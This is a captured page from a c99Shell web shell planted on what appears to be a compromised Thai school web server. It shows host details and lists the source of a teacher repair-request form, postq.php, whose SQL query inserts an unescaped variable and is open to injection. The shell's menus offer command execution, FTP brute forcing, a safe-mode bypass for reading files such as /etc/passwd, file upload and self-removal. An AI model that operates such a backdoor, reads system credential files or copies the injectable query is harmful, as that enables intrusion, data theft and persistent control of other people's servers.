!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     postq.php (11.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start
();
 if (
session_is_registered("valid_user")&&session_is_registered("Priority")&&session_is_registered("password") )
 {
include(
"../include/FunctionDB.php");
include(
"../config.inc.php");
include(
"admin_menu.php");
 
ConnectDB();
$sql "SELECT * FROM personal_tb WHERE Teacher_code='$Teacher_code'";
$res mysql_query($sql);
$rs mysql_fetch_array($res);

?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<script language="JavaScript">
function check()
{
      var v1 = document.webForm.QTitle.value;
      var v2 = document.webForm.QNote.value;
      var v3 = document.webForm.QName.value;
        if ( v1.length<5)
           {
           alert("กรุณาป้อนคำถาม อย่างน้อย 5 ตัวอักษรครับ ");
           document.webForm.QTitle.focus();           
           return false;
           }
        else if (v2.length<5)
           {
           alert("กรุณาป้อนรายละเอียด อย่างน้อย 5 ตัวอักษรครับ");
           document.webForm.QNote.focus();           
           return false;
           }
        else if (v3.length==0)
           {
           alert("กรุณาป้อนชื่อผู้ถาม");
           document.webForm.QName.focus();           
           return false;
           }
        else
           return true;
}

function setURL()
{
    var temp = window.prompt('ใส่ URL ที่คุณต้องการสร้างเป็นลิงค์','http://'); 
    if(temp) setsmile('[url]'+temp+'[/url]');
}

function setImage()
{
    var temp = window.prompt('ใส่ URL ของรูปที่คุณต้องการให้แสดงในกระทู้ของคุณ','http://'); 
    if(temp) setsmile('[img]'+temp+'[/img]');
}

function setBold()
{
    var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวหนา',''); 
    if(temp) setsmile('[b]'+temp+'[/b]');
}

function setItalic()
{
    var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวเอียง',''); 
    if(temp) setsmile('[i]'+temp+'[/i]');
}
function setsup()
{
    var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวยก',''); 
    if(temp) setsmile('[sup]'+temp+'[/sup]');

}
function setsub()
{
    var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวห้อย',''); 
    if(temp) setsmile('[sub]'+temp+'[/sub]');
}
function setglow()
{
    var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวเรืองแสง',''); 
    if(temp) setsmile('[glow]'+temp+'[/glow]');
}
function setshadow()
{
    var temp = window.prompt('ใส่ข้อความที่คุณต้องการทำเป็นตัวเรืองแสง',''); 
    if(temp) setsmile('[shadow]'+temp+'[/shadow]');
}
function setUnderline()
{
    var temp = window.prompt('ใส่ข้อความที่คุณต้องการให้มีเส้นใต้',''); 
    if(temp) setsmile('[u]'+temp+'[/u]');
}

function setColor(color,name)
{
    var temp = window.prompt('ใส่ข้อความที่คุณต้องการให้เป็นสี'+name,''); 
    if(temp) setsmile('[color='+color+']'+temp+'[/color]');
}

function setsmile(what)
{
    document.webForm.QNote.value = document.webForm.elements.QNote.value+" "+what;
    document.webForm.QNote.focus();
}
</script>
<table width="740" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td><br><fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_teacher.php " >หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="ComputerList.php?Teacher_code=<? echo $rs[Teacher_code?>">ข้อมูลการแจ้งซ่อมศูนย์คอมคอมพิวเเตอร์</a></font></legend>
            <label><div align="center">
            <?
include("../function.php");

    
//include("header.php");
?>
              <form method=post action="post.php?Teacher_code=<? echo $Teacher_code?>" name="webForm" onSubmit="return check()" ENCTYPE="multipart/form-data">
                <p align="left"><font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font></p>
                <table width="550" border="1" cellpadding="2" cellspacing="0" bgcolor="#3399FF">
                  
                  <tr bgcolor="#99FFCC">
                    <td width="93" height="37" align="center">                    แจ้งเรื่อง</td>
                    <td width="443"><input name="QTitle" type="text" size="65" maxlength="60" /></td>
                  </tr>
                  <tr bgcolor="#99FFCC">
                    <td align="center" valign="top">เลือกรายการ</td>
                    <td><input name="Category" type="radio" value="computer"  checked/> 
                      คอมพิวเตอร์ 
                      <input name="Category" type="radio" value="network"   />
                      ระบบเครือข่าย 
                      <input name="Category" type="radio" value="printer"   />
                      ปริ้นเตอร์ 
                      <input name="Category" type="radio" value="news">
                      ข่าวประกาศ</td>
                  </tr>
                  <tr bgcolor="#99FFCC">
                    <td align="center" valign="top">รายละเอียด<br />                     
                       สาเหตุปัญหา</td>
                    <td><textarea name="QNote" cols="67" rows="6"></textarea></td>
                  </tr>
                  <tr bgcolor="#99FFCC">
                    <td align="center">โดย</td>
                    <td><input name="QName" type="text" value=" <? echo $rs[Teacher_name];?> &nbsp;<? echo $rs[Teacher_lastname];?>" size="20" maxlength="50" />
                      Password<font color="red">&nbsp;(สำหรับสมาชิก)</font>&nbsp;&nbsp;
                      <input type="password" name="QPass" size="15" maxlength="10" disabled="disabled"/>                    </td>
                  </tr>
                  <tr bgcolor="#99FFCC">
                    <td align="center">E-mail</td>
                    <td><input name="QEmail" type="text" value=" <? echo $rs[Email];?>" size="25" maxlength="50" />
                        <font color="red"> (สมาชิกไม่ต้องใส่)</font></td>
                  </tr>
                  <tr bgcolor="#66CCCC">
                    <td align="center" colspan="2"><a href="javascript:setImage()"><img src="pic/tree.gif" border="0" alt="แทรกรูป" /></a> <a href="javascript:setsmile('[---]')"><img src="pic/indent.gif" border="0" alt="ย่อหน้า" /></a> <a href="javascript:setBold()"><img src="pic/b.gif" border="0" alt="ตัวหนา" /></a> <a href="javascript:setsup()"><img src="pic/sup.gif" border="0" alt="ตัวยก" /></a> <a href="javascript:setsub()"><img src="pic/sub.gif" border="0" alt="ตัวห้อย" /></a> <a href="javascript:setglow()"><img src="pic/glow.gif" border="0" alt="ตัวหนังสือเรืองแสง" /></a> <a href="javascript:setshadow()"><img src="pic/shadow.gif" border="0" alt="ตัวหนังสือมีเงา" /></a> <a href="javascript:setItalic()"><img src="pic/i.gif" border="0" alt="ตัวเอียง" /></a> <a href="javascript:setUnderline()"><img src="pic/u.gif" border="0" alt="เส้นใต้" /></a> <a href="javascript:setColor('red','แดง')"><img src="pic/redcolor.gif" border="0" alt="สีแดง" /></a> <a href="javascript:setColor('green','เขียว')"><img src="pic/greencolor.gif" border="0" alt="สีเขียว" /></a> <a href="javascript:setColor('blue','น้ำเงิน')"><img src="pic/bluecolor.gif" border="0" alt="สีน้ำเงิน" /></a> <a href="javascript:setColor('orange','ส้ม')"><img src="pic/orangecolor.gif" border="0" alt="สีส้ม" /></a> <a href="javascript:setColor('pink','ชมพู')"><img src="pic/pinkcolor.gif" border="0" alt="สีชมพู" /></a> <a href="javascript:setColor('gray','เทา')"><img src="pic/graycolor.gif" border="0" alt="สีเทา" /></a> </td>
                  </tr>
                  <tr> </tr>
                  <tr bgcolor="#99FFCC">
                    <td align="center" colspan="2"><a href="javascript:setsmile(':smile:')"><img src="pic/smile.gif" border="0" /></a> <a href="javascript:setsmile(':sad:')"><img src="pic/frown.gif" border="0" /></a> <a href="javascript:setsmile(':red:')"><img src="pic/redface.gif" border="0" /></a> <a href="javascript:setsmile(':big:')"><img src="pic/biggrin.gif" border="0" /></a> <a href="javascript:setsmile(':ent:')"><img src="pic/blue.gif" border="0" /></a> <a href="javascript:setsmile(':shy:')"><img src="pic/shy.gif" border="0" /></a> <a href="javascript:setsmile(':sleepy:')"><img src="pic/sleepy.gif" border="0" /></a> <a href="javascript:setsmile(':sun:')"><img src="pic/sunglasses.gif" border="0" /></a> <a href="javascript:setsmile(':sg:')"><img src="pic/supergrin.gif" border="0" /></a> <a href="javascript:setsmile(':embarass:')"><img src="pic/embarass.gif"     border="0" /></a> <a href="javascript:setsmile(':dead:')"><img src="pic/dead.gif" border="0" /></a> <a href="javascript:setsmile(':cool:')"><img src="pic/cool.gif" border="0" /></a> <a href="javascript:setsmile(':clown:')"><img src="pic/clown.gif" border="0" /></a> <a href="javascript:setsmile(':pukey:')"><img src="pic/pukey.gif" border="0" /></a> <a href="javascript:setsmile(':eek:')"><img src="pic/eek.gif" border="0" /></a><br />
                        <a href="javascript:setsmile(':roll:')"><img src="pic/sarcblink.gif" border="0" /></a> <a href="javascript:setsmile(':smoke:')"><img src="pic/smokin.gif" border="0" /></a> <a href="javascript:setsmile(':angry:')"><img src="pic/reallymad.gif" border="0" /></a> <a href="javascript:setsmile(':confused:')"><img src="pic/confused.gif"     border="0" /></a> <a href="javascript:setsmile(':cry:')"><img src="pic/crying.gif" border="0" /></a> <a href="javascript:setsmile(':lol:')"><img src="pic/lol.gif" border="0" /></a> <a href="javascript:setsmile(':yawn:')"><img src="pic/yawn.gif" border="0" /></a> <a href="javascript:setsmile(':devil:')"><img src="pic/devil.gif" border="0" /></a> <a href="javascript:setsmile(':tongue:')"><img src="pic/tongue.gif" border="0" /></a> <a href="javascript:setsmile(':alien:')"><img src="pic/aysmile.gif" border="0" /></a> <a href="javascript:setsmile(':tasty:')"><img src="pic/tasty.gif" border="0" /></a> <a href="javascript:setsmile(':crazy:')"><img src="pic/grazy.gif" border="0" /></a> <a href="javascript:setsmile(':h:')"><img src="pic/h.gif" border="0" /></a> <a href="javascript:setsmile(':true:')"><img src="pic/true.gif" border="0" /></a> <a href="javascript:setsmile(':false:')"><img src="pic/false.gif" border="0" /></a> <br />
                        <font color="blue">คลิกที่รูป เพื่อแทรกรูปลงในข้อความ</font> </td>
                  </tr>
                  <tr bgcolor="#99FFCC">
                    <td align="center" colspan="2"><table border="0">
                        <tr>
                          <td align="left"></td>
                        </tr>
                      <tr>
                        <td align="center"> เลือกรูป <?echo " ขนาดห้ามเกิน "$Image_msg ?>
                              <input type="file" name="QPic" />                        </td>
                        <td ><input style="HEIGHT: 17pt" onclick="window.open(webForm.QPic.value,'preview','toolbar=0,location=0,directories=0,status=0,menubar=0,height=600,width=500,scrollbars=1,resizeable=1');" type="button" value="View" name="button" />                        </td>
                      </tr>
                    </table></td>
                  </tr>
                </table>
                <p>
                  <input name="submit" type="submit" value="ส่งคำถาม" />
                  <input name="reset" type="reset" value="ยกเลิก" />
                  <label></label>
                </p>
              </form>
              <font size="2" face="MS Sans Serif">[ <a href="ComputerList.php?Teacher_code=<? echo $Teacher_code?>&amp;page=<? echo $page?>">แสดงข้อมูล</a>  ] </font>
              <hr color="1E90FF" width="600" />
</div>
            </label>
        </fieldset><br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br>
        </font></td>
    </tr>
</table>
<?php 
    
}
else
{
       echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo
"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0154 ]--